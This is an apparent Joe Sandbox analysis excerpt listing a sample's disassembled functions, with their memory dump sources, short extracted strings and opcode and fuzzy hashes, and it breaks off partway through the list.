                                                                                                                                                            • Opcode Fuzzy Hash: 7717c1e47f2c6a07019688ec77de45e732d8ed3bd9f068185cee8165f0e7e653
                                                                                                                                                            • Instruction Fuzzy Hash: 303298B0518381DFD311EF28D880B2ABBE5EB8A344F144EACF5D58B2A2D735D945CB52
                                                                                                                                                            Function 00BA3BE2 Relevance: 5.4, Strings: 4, Instructions: 431COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+($;z$p$ss
                                                                                                                                                            • API String ID: 0-2391135358
                                                                                                                                                            • Opcode ID: 5962925b52c6b895b8478ddfbdf200495fca94714b4ba5ebf4c147cf08fae644
                                                                                                                                                            • Instruction ID: 081f805b348e8d6f1335aaa637d7ba1573e0e01dcf693d9251c82f790a07a162
                                                                                                                                                            • Opcode Fuzzy Hash: 5962925b52c6b895b8478ddfbdf200495fca94714b4ba5ebf4c147cf08fae644
                                                                                                                                                            • Instruction Fuzzy Hash: BB026CB4810700EFD760DF24D986756BFF4FB02700F50899DE89A9B656E731E819CBA2
                                                                                                                                                            Function 00D6029E Relevance: 5.4, Strings: 3, Instructions: 1636COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: C{$VF.W$kQ+_
                                                                                                                                                            • API String ID: 0-2507686725
                                                                                                                                                            • Opcode ID: 1e2e7ef0fcce3f89974c8486265ba6b6309fd95ab3491c8723951fdf39e96b24
                                                                                                                                                            • Instruction ID: 2b09699de7aafc3ead24a7a7e1fe8f7e0b1fee6bde2612a1438b55225806e889
                                                                                                                                                            • Opcode Fuzzy Hash: 1e2e7ef0fcce3f89974c8486265ba6b6309fd95ab3491c8723951fdf39e96b24
                                                                                                                                                            • Instruction Fuzzy Hash: 53B219F360C2049FE3046E2DEC8567ABBDAEFD4720F1A893DE6C4C7744EA3558058696
                                                                                                                                                            Function 00BB2260 Relevance: 5.4, Strings: 4, Instructions: 383COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: a|$hu$lc$sj
                                                                                                                                                            • API String ID: 0-3748788050
                                                                                                                                                            • Opcode ID: 10388a9e91e79e6fc510709721a2dfe432f92c93e78ecb7b8109e1de287d2508
                                                                                                                                                            • Instruction ID: 7388dfb17bf49da1fb9f8627993c780e23de3532525a29c05df49afd33f60fd6
                                                                                                                                                            • Opcode Fuzzy Hash: 10388a9e91e79e6fc510709721a2dfe432f92c93e78ecb7b8109e1de287d2508
                                                                                                                                                            • Instruction Fuzzy Hash: E5A179744083418BC720DF18C891A6BB7F0FFA6354F588A4CE8D59B391E3B9D941CBA6
                                                                                                                                                            Function 00D52E0D Relevance: 5.4, Strings: 3, Instructions: 1601COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 7\,$8}{$~3oY
                                                                                                                                                            • API String ID: 0-2984709647
                                                                                                                                                            • Opcode ID: b7f08d321b764de059f9ed6118e551f22a0503cd148c4d92c5d3a75f39c44a63
                                                                                                                                                            • Instruction ID: fe224f5d992422c66a58b27b736f2397d4dee2d2f677e0e2882ca3b793c91e47
                                                                                                                                                            • Opcode Fuzzy Hash: b7f08d321b764de059f9ed6118e551f22a0503cd148c4d92c5d3a75f39c44a63
                                                                                                                                                            • Instruction Fuzzy Hash: 30B215F36082049FE304AE2DEC8577ABBE5EF94720F1A893DE6C4C7744EA3558058697
                                                                                                                                                            Function 00D5992A Relevance: 5.3, Strings: 3, Instructions: 1563COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 'pH$JCwf${Cp#
                                                                                                                                                            • API String ID: 0-1034368586
                                                                                                                                                            • Opcode ID: 6124d4c1bc3aaaf9c14a524cf12b8c526fa89f8bbfb22e776ef4cbb7ca5ebf4b
                                                                                                                                                            • Instruction ID: 66bc60ee930554023c66fe3bbdce11d819ce0561d9df302f3a038cf4874fa330
                                                                                                                                                            • Opcode Fuzzy Hash: 6124d4c1bc3aaaf9c14a524cf12b8c526fa89f8bbfb22e776ef4cbb7ca5ebf4b
                                                                                                                                                            • Instruction Fuzzy Hash: 6FA208F3A0C200AFE304AE29EC8567AB7E9EF94720F16453DEAC5C7344E67598118697
                                                                                                                                                            Function 00BBD7AF Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: #'$CV$KV$T>
                                                                                                                                                            • API String ID: 0-95592268
                                                                                                                                                            • Opcode ID: fb7359b74e8b73cd6a95400d940819203dfed8dd6f2758a774de258d667afe2e
                                                                                                                                                            • Instruction ID: 081625f9e80793a72e1f1b6f54532f32ff9facd5b1156dc9132fc7d3fdf94e11
                                                                                                                                                            • Opcode Fuzzy Hash: fb7359b74e8b73cd6a95400d940819203dfed8dd6f2758a774de258d667afe2e
                                                                                                                                                            • Instruction Fuzzy Hash: D78186B48017469BCB20DF95C2855AEBFF1FF02300F204A0CE486ABA45D374AA55CFE2
                                                                                                                                                            Function 00BBAC91 Relevance: 5.1, Strings: 4, Instructions: 128COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (g6e$,{*y$4c2a$lk
                                                                                                                                                            • API String ID: 0-1327526056
                                                                                                                                                            • Opcode ID: 626e96baf52fe1b55d37eb1c85fece5684b101ea515612c3030f8a2d40737e2d
                                                                                                                                                            • Instruction ID: 40dc9fb442e2a59036d5e1c1fb13bb68bd5cf9ebb6a86a6b9cb0330becfbd9dd
                                                                                                                                                            • Opcode Fuzzy Hash: 626e96baf52fe1b55d37eb1c85fece5684b101ea515612c3030f8a2d40737e2d
                                                                                                                                                            • Instruction Fuzzy Hash: C84175B4808381CBD7209F24D940BABB7F0FF86305F5459ADE5C89B261EB71D944CB96
                                                                                                                                                            Function 00BBC470 Relevance: 4.2, Strings: 3, Instructions: 419COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+($%*+($~/i!
                                                                                                                                                            • API String ID: 0-4033100838
                                                                                                                                                            • Opcode ID: d8a8e9d8abd2ff7ac5ac4cba9753218c25531d6eba829ce8fde44e23cce670c9
                                                                                                                                                            • Instruction ID: 0a86abb67b0e6fb18d125c32940e86f0b944889cf8ebe3670f08cdfeb8959c20
                                                                                                                                                            • Opcode Fuzzy Hash: d8a8e9d8abd2ff7ac5ac4cba9753218c25531d6eba829ce8fde44e23cce670c9
                                                                                                                                                            • Instruction Fuzzy Hash: 5CE185B5519380DFE720DF28D881B6ABBE5FB85344F588C6CE5C98B251EB71D810CB92
                                                                                                                                                            Function 00B98590 Relevance: 4.1, Strings: 3, Instructions: 387COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )$)$IEND
                                                                                                                                                            • API String ID: 0-588110143
                                                                                                                                                            • Opcode ID: 4db8e0525cd641a0d1f901603876a7643e1c156f3772d3b59ac4974aa743468c
                                                                                                                                                            • Instruction ID: 60500199474cb041e2b07c35f83a49b331cbe2900b56ff05aa57be88dca6378c
                                                                                                                                                            • Opcode Fuzzy Hash: 4db8e0525cd641a0d1f901603876a7643e1c156f3772d3b59ac4974aa743468c
                                                                                                                                                            • Instruction Fuzzy Hash: C8E1CFB1A087059FEB10CF28C88172ABBE0FB95314F14497DE5999B392DB75E914CBC2
                                                                                                                                                            Function 00D5CE41 Relevance: 4.1, Strings: 2, Instructions: 1560COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4c[w$DXN
                                                                                                                                                            • API String ID: 0-3091199229
                                                                                                                                                            • Opcode ID: d8d596a75e9e63e90c8a9f4e87b26f00af8127e17530e22a3f37a3cc0e69649c
                                                                                                                                                            • Instruction ID: b730049e4b3c41434e628b7d4398b6252f3421f9f717e963c2266a526343d001
                                                                                                                                                            • Opcode Fuzzy Hash: d8d596a75e9e63e90c8a9f4e87b26f00af8127e17530e22a3f37a3cc0e69649c
                                                                                                                                                            • Instruction Fuzzy Hash: 65B2F5F3A0C6109FE3046E29EC8567AFBE5EF94720F1A893DEAC483744E63558058797
                                                                                                                                                            Function 00D4E535 Relevance: 3.5, Strings: 2, Instructions: 1012COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %Ju${z
                                                                                                                                                            • API String ID: 0-1876609873
                                                                                                                                                            • Opcode ID: f97ba4501f9cc7fdeff159222b18e8f8be40a756ca0c15c553a4247072e681a7
                                                                                                                                                            • Instruction ID: fb1862cafbb2d704075a193ecf8d216e43ed72cdbd97c194aa5bf0faf953f725
                                                                                                                                                            • Opcode Fuzzy Hash: f97ba4501f9cc7fdeff159222b18e8f8be40a756ca0c15c553a4247072e681a7
                                                                                                                                                            • Instruction Fuzzy Hash: 166219F3A0C6049FE3146E6DEC8567AFBE9EF94320F164A3DE6C4C7744E63598018692
                                                                                                                                                            Function 00D4C927 Relevance: 3.4, Strings: 2, Instructions: 916COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: R>p($cjZ
                                                                                                                                                            • API String ID: 0-461656703
                                                                                                                                                            • Opcode ID: c9412599e86f1acba531cd4bbbe76f8b7a1429c958cfe381749cafa8d3716bea
                                                                                                                                                            • Instruction ID: c3dbc2f2db306170bd410e5b93415840919bccd447c344fff9c54c4d06df8884
                                                                                                                                                            • Opcode Fuzzy Hash: c9412599e86f1acba531cd4bbbe76f8b7a1429c958cfe381749cafa8d3716bea
                                                                                                                                                            • Instruction Fuzzy Hash: CE524BF390C304AFD7046E2DEC8567ABBE9EF94720F1A463DE6C4C7744EA3598058686
                                                                                                                                                            Function 00BD4040 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
